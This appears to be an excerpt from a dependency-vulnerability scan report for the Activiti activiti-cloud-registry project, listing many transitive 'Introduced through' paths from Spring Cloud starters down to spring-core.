  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-actuator-autoconfigure@4.1.0-RC1 org.springframework.boot:spring-boot-actuator@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-expression@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-actuator-autoconfigure@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-expression@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-expression@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-expression@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-freemarker@4.0.2 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-expression@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.boot:spring-boot-starter-cache@4.0.2 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-expression@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 org.springframework.boot:spring-boot-micrometer-metrics@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-expression@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-expression@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-expression@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-jackson@4.1.0-RC1 org.springframework.boot:spring-boot-jackson@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-expression@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 org.springframework.boot:spring-boot-servlet@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-expression@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-expression@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-expression@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-expression@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-jackson@4.1.0-RC1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 org.springframework.boot:spring-boot-micrometer-metrics@4.1.0-RC1 org.springframework.boot:spring-boot-micrometer-observation@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-web-server@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 org.springframework.boot:spring-boot-web-server@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-web-server@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-web-server@4.1.0-RC1 org.springframework:spring-web@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework:spring-web@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework:spring-web@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-config-client@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-config-client@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-config-client@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-config-client@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-config-client@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework:spring-web@7.0.3 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-config-client@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-config-client@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-expression@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-config-client@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-expression@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-config-client@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-expression@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-config-client@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-actuator-autoconfigure@4.1.0-RC1 org.springframework.boot:spring-boot-actuator@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-actuator-autoconfigure@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-freemarker@4.0.2 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.boot:spring-boot-starter-cache@4.0.2 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
